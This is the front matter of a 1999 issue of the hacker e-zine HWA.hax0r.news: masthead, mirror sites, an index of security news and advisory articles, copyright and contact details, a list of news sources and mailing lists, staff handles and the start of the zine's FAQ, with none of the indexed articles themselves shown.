home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / hwahaxornews / HWA-hn27.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  554.1 KB  |  11,458 lines

  1.     [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  2.   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  3.   ==========================================================================
  4.   =                       <=-[ HWA.hax0r.news ]-=>                         =
  5.   ==========================================================================
  6.     [=HWA'99=]                         Number 27 Volume 1 1999 July 31st  99
  7.   ==========================================================================
  8.     [                     61:20:6B:69:64:20:63:6F:75:                    ]
  9.     [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
  10.     [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  11.   ==========================================================================
  12.  
  13.    New mirror site, Stefan did a *very* nice job on this check it out, 
  14.    
  15.                   http://www.alldas.de/hwaidx1.htm
  16.  
  17.  
  18.      HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
  19.      and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
  20.      and airportman for the Cubesoft bandwidth. Also shouts out to all our
  21.      mirror sites! tnx guys. 
  22.      
  23.      http://www.csoft.net/~hwa
  24.      http://www.digitalgeeks.com/hwa
  25.  
  26.      
  27.      HWA.hax0r.news Mirror Sites:
  28.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  29.      http://www.alldas.de/hwaidx1.htm ** NEW **
  30.      http://www.csoft.net/~hwa/ 
  31.      http://www.digitalgeeks.com/hwa.
  32.      http://members.tripod.com/~hwa_2k
  33.      http://welcome.to/HWA.hax0r.news/
  34.      http://www.attrition.org/~modify/texts/zines/HWA/
  35.      http://archives.projectgamma.com/zines/hwa/.  
  36.      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
  37.  
  38.    
  39.                
  40.      
  41.         
  42.   
  43.    SYNOPSIS (READ THIS)
  44.    --------------------
  45.    
  46.    The purpose of this newsletter is to 'digest' current events of interest
  47.    that affect the online underground and netizens in general. This includes
  48.    coverage of general security issues, hacks, exploits, underground news
  49.    and anything else I think is worthy of a look see. (remember i'm doing
  50.    this for me, not you, the fact some people happen to get a kick/use
  51.    out of it is of secondary importance).
  52.  
  53.     This list is NOT meant as a replacement for, nor to compete with, the
  54.    likes of publications such as CuD or PHRACK or with news sites such as
  55.    AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  56.    BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  57.  
  58.     It *is* intended  however, to  compliment such material and provide a
  59.    reference to those who follow the culture by keeping tabs on as many
  60.    sources as possible and providing links to further info, its a labour
  61.    of love and will be continued for as long as I feel like it, i'm not
  62.    motivated by dollars or the illusion of fame, did you ever notice how
  63.    the most famous/infamous hackers are the ones that get caught? there's
  64.    a lot to be said for remaining just outside the circle... <g>
  65.    
  66.    
  67.  
  68.    @HWA
  69.  
  70.    =-----------------------------------------------------------------------=
  71.  
  72.                      Welcome to HWA.hax0r.news ... #27
  73.  
  74.    =-----------------------------------------------------------------------=
  75.  
  76.  
  77.     
  78.     We could use some more people joining the channel, its usually pretty
  79.     quiet, we don't bite (usually) so if you're hanging out on irc stop
  80.     by and idle a while and say hi...   
  81.  
  82.     *******************************************************************
  83.     ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  84.     ***                                                             ***
  85.     *** please join to discuss or impart news on techno/phac scene  ***
  86.     *** stuff or just to hang out ... someone is usually around 24/7***
  87.     ***                                                             ***
  88.     *** Note that the channel isn't there to entertain you its for  ***
  89.     *** you to talk to us and impart news, if you're looking for fun***
  90.     *** then do NOT join our channel try #weirdwigs or something... ***
  91.     *** we're not #chatzone or #hack                                ***
  92.     ***                                                             ***
  93.     *******************************************************************
  94.  
  95.  
  96.   =-------------------------------------------------------------------------=
  97.   
  98.   Issue #27
  99.  
  100.   =--------------------------------------------------------------------------=
  101.   [ INDEX ]
  102.   =--------------------------------------------------------------------------=
  103.     Key     Intros                                                         
  104.   =--------------------------------------------------------------------------=
  105.  
  106.     00.0  .. COPYRIGHTS ......................................................
  107.     00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
  108.     00.2  .. SOURCES .........................................................
  109.     00.3  .. THIS IS WHO WE ARE ..............................................
  110.     00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
  111.     00.5  .. THE HWA_FAQ V1.0 ................................................
  112.  
  113.   =--------------------------------------------------------------------------=
  114.     Key     Content 
  115.   =--------------------------------------------------------------------------=
  116.  
  117.     01.0  .. GREETS ..........................................................
  118.      01.1 .. Last minute stuff, rumours, newsbytes ...........................
  119.      01.2 .. Mailbag .........................................................
  120.     02.0  .. From the Editor.................................................. 
  121.     03.0  .. l0pht releases AntiSniff - Press release.........................
  122.     04.0  .. Pixar to remake TRON?............................................
  123.     05.0  .. Meet the fed (zdtv:Defcon).......................................
  124.     06.0  .. Poulsen at DefCon................................................
  125.     07.0  .. Y2K Situation in Europe..........................................
  126.     08.0  .. Applied Maximum Internet Security................................
  127.     09.0  .. HPSBUX9907-100 CDE Leaves Current Directory in root PATH.........
  128.     10.0  .. Tiger vulnerability..............................................
  129.     11.0  .. Tattooman (Ken Williams) climbs back in the ring.................
  130.     12.0  .. UPDATE ON THE PACKET STORM WEB SITE SITUATION....................
  131.     13.0  .. Piracy is Big Business for Some .................................
  132.     14.0  .. Mitnick sentencing postponed again...............................
  133.     15.0  .. Military Reserves to be Used for Cyber Defense ..................
  134.     16.0  .. Kodak's new PROM copy-killer?....................................
  135.     17.0  .. Sandstorm Releases New Version of Phone Sweep ...................
  136.     18.0  .. Major FUD - US Under Attack by Russians..........................
  137.     19.0  .. BO2K and SMS, Which One is Evil? ................................
  138.     20.0  .. The Last True Hacker ............................................
  139.     21.0  .. One Russian ISP Standing Up to FSB ..............................
  140.     22.0  .. Gameboy steals cars, makes free fone calls.......................
  141.     23.0  .. Mitnick Retains High Profile Lawyer For State Case ..............
  142.     24.0  .. Back Orifice for Macintosh? .....................................
  143.     25.0  .. AOL Criminals Busted ............................................
  144.     26.0  .. Press Does Not Know What to Say About BO2K ......................
  145.     27.0  .. UCITA Moves Forward - Will Remove Vendor Liability...............
  146.     28.0  .. NSC Proposes FidNet - Infrastructure Protection or Surveillance Tool? 
  147.     29.0  .. Local Cops Funded by IT Industry ................................
  148.     30.0  .. Two Arrested for Corporate Espionage ............................
  149.     31.0  .. Virus Infestations On the Rise ..................................
  150.     32.0  .. Granny Hacker from Heck visits Def Con parts 1 to 3..............
  151.     33.0  .. FidNet Causing Massive Confusion ................................
  152.     34.0  .. Lawmakers Want Drug Info Off the Net ............................
  153.     35.0  .. Reno Wants Inet Crypto Banned ...................................
  154.     36.0  .. CCC Camp Happens Next Weekend ...................................
  155.     37.0  .. Computer Criminal Busted in UK ..................................
  156.     38.0  .. Researching an attack (KeyRoot) by Mnemonic.......................
  157.     39.0  .. Win98 Security Issues A KeyRoot/gH Advisory by Mnemonic...........
  158.     40.0  .. WLDoTrans.asp allows CC retrieval A gH Advisory by Mnemonic.......
  159.     41.0  .. bad CGI scripts allow web access A gH Advisory by Mnemonic........
  160.     42.0  .. Can my firewall protect me? by Mnemonic...........................  
  161.     43.0  .. How company specific programs can be used against the company by Mnemonic
  162.     44.0  .. Exploiting the netware bindery by Mnemonic........................
  163.     45.0  .. Tax Break for Key Escrow Crypto ..................................
  164.     46.0  .. NSA Claims Israel Attacking US ...................................
  165.     47.0  .. Jail Time for Users of Crypto ....................................
  166.     48.0  .. Office97 Users Ripe for the Picking ..............................
  167.     49.0  .. China Sends Pirate to Jail .......................................
  168.     50.0  .. MITNICK: FEDERAL GOVERNMENT MANIPULATED THE FACTS.................
  169.     51.0  .. ISPS ACCUSE CHINA OF INFOWAR......................................
  170.     52.0  .. PETERSEN INTERVIEW: TRADING CYBERCRIME FOR CYBERPORN..............
  171.     53.0  .. GHOSTS IN THE MACHINE.............................................
  172.     54.0  .. DATABASE PROTECTIONS OK-D.........................................
  173.     55.0  .. YET ANOTHER SITE SPITTING OUT PERSONAL INFO.......................
  174.     56.0  .. CALIFORNIA ADOPTS DIGITAL SIGNATURE LAW...........................
  175.     57.0  .. NEW AMMO AGAINST VIRUSES..........................................
  176.     58.0  .. DOE SECRETARY ORDERS SECURITY BREAK...............................
  177.     59.0  .. EU MEMBERS NOT FOLLOWING DATA-PROTECTION RULES....................
  178.     60.0  .. EXPERTS WARN ABOUT NEW Y2K-THREAT.................................
  179.     61.0  .. WILL YOUR CABLE MODEM CENSOR THE WEB?.............................
  180.     62.0  .. UNMASKING ANONYMOUS POSTERS.......................................
  181.     63.0  .. AOL Y2KFIX: A HOAX DISGUISED AS A HOAX?...........................
  182.     64.0  .. NO FBI SURVEILLANCE AFTER CRITICISMS..............................
  183.     65.0  .. FEDS CRACK DOWN ON Y2K FRAUD......................................
  184.     66.0  .. RED HAT DELIVERS LINUX E-COMMERCE SERVER..........................
  185.     67.0  .. HACKING IN 1999 ..................................................
  186.     68.0  .. Y2k crash test for Windows and DOS................................
  187.     69.0  .. CASSANDRA GOLD....................................................
  188.     70.0  .. BELL CANADA Y2k TEST..............................................
  189.     71.0  .. [RHSA-1999:025-01] Potential misuse of squid cachemgr.cgi ........
  190.     72.0  .. [RHSA-1999:022-03] New Samba pacakges available (updated).........      
  191.     73.0  .. CERT« Advisory CA-99-10 Insecure Default Configuration on RaQ2 Servers 
  192.     74.0  .. MS Security Bulletin: Patch Available for "Malformed Dialer Entry" Vulnerability
  193.     75.0  .. Senate asks for input into information infrastructure protection plan
  194.     76.0  .. FBI: beware outside Y2K workers...................................
  195.     77.0  .. HPSBUX9907-101 Security Vulnerability Software Distributor (SD)...
  196.     78.0  .. NSA spying on Americans? (who ya kidding??? of COURSE they are)...
  197.     79.0  .. AOL messaging policy might risk cable deals ......................
  198.     80.0  .. Study calls for reserve virtual IT warfare unit...................
  199.     81.0  .. CERT IN-99-04: Similar Attacks Using Various RPC Services.........
  200.     =--------------------------------------------------------------------------=   
  201.     
  202.     AD.S  .. Post your site ads or etc here, if you can offer something in return
  203.              thats tres cool, if not we'll consider ur ad anyways so send it in.
  204.              ads for other zines are ok too btw just mention us in yours, please
  205.              remember to include links and an email contact. Corporate ads will
  206.              be considered also and if your company wishes to donate to or 
  207.              participate in the upcoming Canc0n99 event send in your suggestions
  208.              and ads now...n.b date and time may be pushed back join mailing list
  209.              for up to date information.......................................
  210.              Current dates: Aug19th-22nd Niagara Falls...    .................
  211.     Ha.Ha .. Humour and puzzles  ............................................
  212.               
  213.               Hey You!........................................................
  214.               =------=........................................................
  215.               
  216.               Send in humour for this section! I need a laugh and its hard to
  217.               find good stuff... ;)...........................................
  218.  
  219.     SITE.1 .. Featured site, .................................................
  220.      H.W   .. Hacked Websites  ...............................................
  221.      A.0   .. APPENDICES......................................................
  222.      A.1   .. PHACVW linx and references......................................
  223.  
  224.   =--------------------------------------------------------------------------=
  225.      
  226.      @HWA'99
  227.  
  228.      
  229.  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
  230.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  231.  
  232.           THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
  233.           OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
  234.           WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
  235.           (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
  236.           READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  237.      
  238.           Important semi-legalese and license to redistribute:
  239.      
  240.           YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
  241.           AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
  242.           ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
  243.           IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
  244.           APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
  245.           IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
  246.           ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
  247.           ME PRIVATELY current email cruciphux@dok.org
  248.      
  249.           THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
  250.           WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
  251.           THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
  252.      
  253.           I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  254.           AND REDISTRIBUTE/MIRROR. - EoD
  255.      
  256.      
  257.           Although this file and all future issues are now copyright, some of
  258.          the content holds its  own copyright and these are printed and
  259.          respected. News is news so i'll print any and all news but will quote
  260.          sources when the source is known, if its good enough for CNN its good
  261.          enough for me. And i'm doing it for free on my own time so pfffft. :)
  262.      
  263.          No monies are made or sought through the distribution of this material.
  264.          If you have a problem or concern email me and we'll discuss it.
  265.      
  266.          cruciphux@dok.org
  267.      
  268.          Cruciphux [C*:.]
  269.  
  270.  
  271.  
  272.  00.1 CONTACT INFORMATION AND MAIL DROP
  273.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  274.  
  275.  
  276.      Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  277.     Canada / North America (hell even if you are inside ..) and wish to
  278.     send printed matter like newspaper clippings a subscription to your
  279.     cool foreign hacking zine or photos, small non-explosive packages
  280.     or sensitive information etc etc well, now you can. (w00t) please
  281.     no more inflatable sheep or plastic dog droppings, or fake vomit
  282.     thanks.
  283.  
  284.     Send all goodies to:
  285.  
  286.         HWA NEWS
  287.         P.O BOX 44118
  288.         370 MAIN ST. NORTH
  289.         BRAMPTON, ONTARIO
  290.         CANADA
  291.         L6V 4H5
  292.  
  293.     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  294.     ~~~~~~~  reading this from some interesting places, make my day and get a
  295.              mention in the zine, send in a postcard, I realize that some places
  296.              it is cost prohibitive but if you have the time and money be a cool
  297.              dude / gal and send a poor guy a postcard preferably one that has some
  298.              scenery from your place of residence for my collection, I collect stamps
  299.              too so you kill two birds with one stone by being cool and mailing in a
  300.              postcard, return address not necessary, just a  "hey guys being cool in
  301.              Bahrain, take it easy" will do ... ;-) thanx.
  302.  
  303.  
  304.  
  305.     Ideas for interesting 'stuff' to send in apart from news:
  306.  
  307.     - Photo copies of old system manual front pages (optionally signed by you) ;-)
  308.     - Photos of yourself, your mom, sister, dog and or cat in a NON
  309.       compromising position plz I don't want pr0n. <g>
  310.     - Picture postcards
  311.     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  312.       tapes with hack/security related archives, logs, irc logs etc on em.
  313.     - audio or video cassettes of yourself/others etc of interesting phone
  314.       fun or social engineering examples or transcripts thereof.
  315.     
  316.     
  317.     Stuff you can email:
  318.     
  319.     - Prank phone calls in .ram or .mp* format
  320.     - Fone tones and security announcements from PBX's etc
  321.     - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
  322.     - reserved for one smiley face ->        :-)            <-
  323.     - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
  324.     - burns of phac cds (email first to make sure we don't already have em)
  325.     - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
  326.     
  327.  
  328.     If you still can't think of anything you're probably not that interesting
  329.     a person after all so don't worry about it <BeG>
  330.  
  331.     Our current email:
  332.  
  333.     Submissions/zine gossip.....: hwa@press.usmc.net
  334.     Private email to editor.....: cruciphux@dok.org
  335.     Distribution/Website........: sas72@usa.net
  336.  
  337.     @HWA
  338.  
  339.  
  340.  
  341.  00.2 Sources ***
  342.       ~~~~~~~~~~~
  343.  
  344.      Sources can be some, all, or none of the following (by no means complete
  345.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  346.     from lists or news from other sites, articles and information is compiled
  347.     and or sourced by Cruciphux no copyright claimed.
  348.  
  349.     News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
  350.     Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
  351.     News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
  352.     Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
  353.     News,Advisories,++ .(lophtcrack)..<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
  354.     NewsTrolls .(daily news ).........<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
  355.     News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
  356.     CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
  357.     News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
  358.     News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
  359.     News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
  360.     News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
  361.     News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
  362.     News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
  363.     News/Techie news site.............<a href="http://www.slashdot.org/>http://www.slashdot.org</a>
  364.     
  365.     
  366.  
  367.     +Various mailing lists and some newsgroups, such as ...
  368.     +other sites available on the HNN affiliates page, please see
  369.      http://www.hackernews.com/affiliates.html as they seem to be popping up
  370.      rather frequently ...
  371.  
  372.     
  373.     http://www.the-project.org/ .. IRC list/admin archives
  374.     http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  375.  
  376.     alt.hackers.malicious
  377.     alt.hackers
  378.     alt.2600
  379.     BUGTRAQ
  380.     ISN security mailing list
  381.     ntbugtraq
  382.     <+others>
  383.  
  384.     NEWS Agencies, News search engines etc:
  385.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  386.     http://www.cnn.com/SEARCH/
  387.     <a href="http://www.cnn.com/SEARCH/">Link</a>
  388.     
  389.     http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
  390.     <a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
  391.     
  392.     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
  393.     <a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
  394.     
  395.     http://www.ottawacitizen.com/business/
  396.     <a href="http://www.ottawacitizen.com/business/">Link</a>
  397.     
  398.     http://search.yahoo.com.sg/search/news_sg?p=hack
  399.     <a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
  400.     
  401.     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
  402.     <a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
  403.     
  404.     http://www.zdnet.com/zdtv/cybercrime/
  405.     <a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
  406.     
  407.     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
  408.     <a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
  409.     
  410.     NOTE: See appendices for details on other links.
  411.     
  412.  
  413.  
  414.     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  415.     <a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
  416.     
  417.     http://freespeech.org/eua/ Electronic Underground Affiliation
  418.     <a href="http://freespeech.org/eua/">Link</a>
  419.     
  420.     http://ech0.cjb.net ech0 Security
  421.     <a href="http://ech0.cjb.net">Link</a>
  422.  
  423.     http://axon.jccc.net/hir/ Hackers Information Report
  424.     <a href="http://axon.jccc.net/hir/">Link</a>
  425.     
  426.     http://net-security.org Net Security
  427.     <a href="http://net-security.org">Link</a>  
  428.     
  429.     http://www.403-security.org Daily news and security related site
  430.     <a href="http://www.403-security.org">Link</a>
  431.     
  432.  
  433.     Submissions/Hints/Tips/Etc
  434.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  435.  
  436.     All submissions that are `published' are printed with the credits
  437.     you provide, if no response is received by a week or two it is assumed
  438.     that you don't care wether the article/email is to be used in an issue
  439.     or not and may be used at my discretion.
  440.  
  441.     Looking for:
  442.  
  443.     Good news sites that are not already listed here OR on the HNN affiliates
  444.     page at http://www.hackernews.com/affiliates.html
  445.  
  446.     Magazines (complete or just the articles) of breaking sekurity or hacker
  447.     activity in your region, this includes telephone phraud and any other
  448.     technological use, abuse hole or cool thingy. ;-) cut em out and send it
  449.     to the drop box.
  450.  
  451.  
  452.     - Ed
  453.  
  454.     Mailing List Subscription Info   (Far from complete)         Feb 1999
  455.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~
  456.  
  457.     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
  458.  
  459.  
  460.     THE MOST READ:
  461.  
  462.     BUGTRAQ - Subscription info
  463.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  464.  
  465.     What is Bugtraq?
  466.  
  467.     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  468.     file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
  469.     bugtraq, send mail to listserv@netspace.org containing the message body
  470.     subscribe bugtraq. I've been archiving this list on the web since late
  471.     1993. It is searchable with glimpse and archived on-the-fly with hypermail.
  472.  
  473.     Searchable Hypermail Index;
  474.  
  475.           http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
  476.  
  477.           <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
  478.  
  479.     About the Bugtraq mailing list
  480.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  481.  
  482.     The following comes from Bugtraq's info file:
  483.  
  484.     This list is for *detailed* discussion of UNIX security holes: what they are,
  485.     how to exploit, and what to do to fix them.
  486.  
  487.     This list is not intended to be about cracking systems or exploiting their
  488.     vulnerabilities. It is about defining, recognizing, and preventing use of
  489.     security holes and risks.
  490.  
  491.     Please refrain from posting one-line messages or messages that do not contain
  492.     any substance that can relate to this list`s charter.
  493.  
  494.     I will allow certain informational posts regarding updates to security tools,
  495.     documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
  496.     on this list.
  497.  
  498.     Please follow the below guidelines on what kind of information should be posted
  499.     to the Bugtraq list:
  500.  
  501.     + Information on Unix related security holes/backdoors (past and present)
  502.     + Exploit programs, scripts or detailed processes about the above
  503.     + Patches, workarounds, fixes
  504.     + Announcements, advisories or warnings
  505.     + Ideas, future plans or current works dealing with Unix security
  506.     + Information material regarding vendor contacts and procedures
  507.     + Individual experiences in dealing with above vendors or security organizations
  508.     + Incident advisories or informational reporting
  509.  
  510.     Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
  511.     reflector address if the response does not meet the above criteria.
  512.  
  513.     Remember: YOYOW.
  514.  
  515.     You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
  516.     those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
  517.  
  518.     For questions or comments, please mail me:
  519.     chasin@crimelab.com (Scott Chasin)
  520.  
  521.  
  522.     
  523.     Crypto-Gram
  524.     ~~~~~~~~~~~
  525.  
  526.        CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  527.       insights, and commentaries on cryptography and computer security.
  528.  
  529.       To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  530.       blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe,
  531.       visit http://www.counterpane.com/unsubform.html.á Back issues are available
  532.       on http://www.counterpane.com.
  533.  
  534.        CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of
  535.       Counterpane Systems, the author of "Applied Cryptography," and an inventor
  536.       of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of
  537.       the International Association for Cryptologic Research, EPIC, and VTW.á He
  538.       is a frequent writer and lecturer on cryptography.
  539.  
  540.  
  541.     CUD Computer Underground Digest
  542.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  543.     This info directly from their latest ish:
  544.  
  545.     Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09
  546. ááááá
  547. ááááááááááááááááááááá ISSNá 1004-042X
  548.  
  549. áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
  550. áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
  551. áááááá Archivist: Brendan Kehoe
  552. áááááá Poof Reader:áá Etaion Shrdlu, Jr.
  553. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth
  554. ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala
  555. ááááááááááááááááááááááááá Ian Dickinson
  556. áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
  557.  
  558.  
  559.  
  560.     [ISN] Security list
  561.     ~~~~~~~~~~~~~~~~~~~
  562.     This is a low volume list with lots of informative articles, if I had my
  563.     way i'd reproduce them ALL here, well almost all .... ;-) - Ed
  564.  
  565.  
  566.     Subscribe: mail majordomo@repsec.com with "subscribe isn".
  567.  
  568.  
  569.  
  570.     @HWA
  571.  
  572.  
  573.  00.3 THIS IS WHO WE ARE
  574.       ~~~~~~~~~~~~~~~~~~
  575.  
  576.       Some HWA members and Legacy staff
  577.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  578.       cruciphux@dok.org.........: currently active/editorial
  579.       darkshadez@ThePentagon.com: currently active/man in black
  580.       fprophet@dok.org..........: currently active/IRC+ man in black
  581.       sas72@usa.net ............. currently active/IRC+ distribution
  582.       vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  583.       dicentra...(email withheld): IRC+ grrl in black
  584.       eentity ...( ''      ''   ): Currently active/IRC+ man in black
  585.  
  586.  
  587.       Foreign Correspondants/affiliate members
  588.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  589.       
  590.        Qubik ............................: United Kingdom 
  591.        D----Y ...........................: USA/world media
  592.        HWA members ......................: World Media
  593.        
  594.       
  595.       
  596.       Past Foreign Correspondants (currently inactive or presumed dead) 
  597.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  598.        
  599.        N0Portz ..........................: Australia           
  600.        system error .....................: Indonesia           
  601.        Wile (wile coyote) ...............: Japan/the East      
  602.        Ruffneck  ........................: Netherlands/Holland 
  603.  
  604.        
  605.        Please send in your sites for inclusion here if you haven't already
  606.        also if you want your emails listed send me a note ... - Ed
  607.  
  608.       Spikeman's site is down as of this writing, if it comes back online it will be
  609.       posted here.
  610.       http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
  611.        
  612.  
  613.        *******************************************************************
  614.        ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  615.        *******************************************************************
  616.  
  617.     :-p
  618.  
  619.  
  620.     1. We do NOT work for the government in any shape or form.Unless you count paying
  621.        taxes ... in which case we work for the gov't in a BIG WAY. :-/
  622.  
  623.     2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
  624.        events its a good idea to check out issue #1 at least and possibly also the
  625.        Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
  626.  
  627.  
  628.     @HWA
  629.  
  630.  
  631.  
  632.  00.4 Whats in a name? why HWA.hax0r.news??
  633.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  634.                              
  635.       
  636.       Well what does HWA stand for? never mind if you ever find out I may
  637.      have to get those hax0rs from 'Hackers' or the Pretorians after you.
  638.  
  639.      In case you couldn't figure it out hax0r is "new skewl" and although
  640.      it is laughed at, shunned, or even pidgeon holed with those 'dumb
  641.      leet (l33t?) dewds' <see article in issue #4> this is the state
  642.      of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
  643.      up  and comers, i'd highly recommend you get that book. Its almost
  644.      like  buying a clue. Anyway..on with the show .. - Editorial staff
  645.  
  646.  
  647.      @HWA
  648.  
  649. 00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
  650.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  651.  
  652.     Also released in issue #3. (revised) check that issue for the faq
  653.     it won't be reprinted unless changed in a big way with the exception
  654.     of the following excerpt from the FAQ, included to assist first time
  655.     readers:
  656.  
  657.     Some of the stuff related to personal useage and use in this zine are
  658.     listed below: Some are very useful, others attempt to deny the any possible
  659.     attempts at eschewing obfuscation by obsucuring their actual definitions.
  660.  
  661.     @HWA   - see EoA  ;-)
  662.  
  663.     !=     - Mathematical notation "is not equal to" or "does not equal"
  664.              ASC(247)  "wavey equals" sign means "almost equal" to. If written
